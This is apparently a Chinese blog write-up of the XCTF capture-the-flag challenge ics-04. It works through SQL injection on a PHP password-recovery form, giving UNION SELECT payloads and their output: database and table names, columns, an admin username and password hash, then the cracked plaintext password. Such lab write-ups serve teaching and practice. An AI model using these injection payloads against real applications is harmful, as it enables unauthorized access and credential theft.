zoukankan      html  css  js  c++  java
  • 【XCTF】ics-04

    信息:

    题目来源:XCTF 4th-CyberEarth

    标签:PHPSQL注入

    题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag

    解题过程

    进入注册页面,尝试注册:

    ics-041

    进行登录:

    ics-042

    提示普通用户登录无用,猜测需要使用管理员等用户登录,获取flag。

    首先弱口令爆破(猜测考察弱口令的可能性小)。

    ics-045

    无果,尝试使用sql注入。

    对登录和注册的输入的逐一进行测试:

    ics-043

    在找回密码处,发现输入漏洞:

    ics-044

    在测试时还发现可以使用同一用户名重复注册。

    进行显示位测试,发现第三项正常显示。

    ics-046

    获取数据库名:

    username = dmin' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4 #
    [OUTPUT]:information_schema,cetc004,mysql,performance_schema
    

    获取表名:

    username = admin' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='cetc004'),4 #
    [OUTPUT]:user
    

    获取字段名:

    username= admin' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='cetc004' and table_name='user'),4 #
    [OUTPUT]:username,password,question,answer
    

    获取用户名密码:

    username= admin' union select 1,2,(select group_concat(username,'~',password) from cetc004.user),4 #
    [OUTPUT]:c3tlwDmIn23~2f8667f381ff50ced6a3edc259260ba9
    

    再次注册c3tlwDmIn23用户,密码随意,得到flag。

    https://www.somd5.com/

    密码的MD5:2f8667f381ff50ced6a3edc259260ba9。

    解密为:1qazWSXED56yhn8ujm9olk81wdfTG

  • 相关阅读:
    Owin
    C#不区分大小写的字符串替换(Replace)函数
    如何创建测试程序调试nginx数据结构
    一张脑图说清 Nginx 的主流程
    gdb常用命令记录
    nginx的configure流程
    c 编译器大全
    PHP 的 uniqid 函数产生的 id 真的是唯一的么?
    UUID那些事
    PHP 编码规范
  • 原文地址:https://www.cnblogs.com/chalan630/p/13231355.html
Copyright © 2011-2022 走看看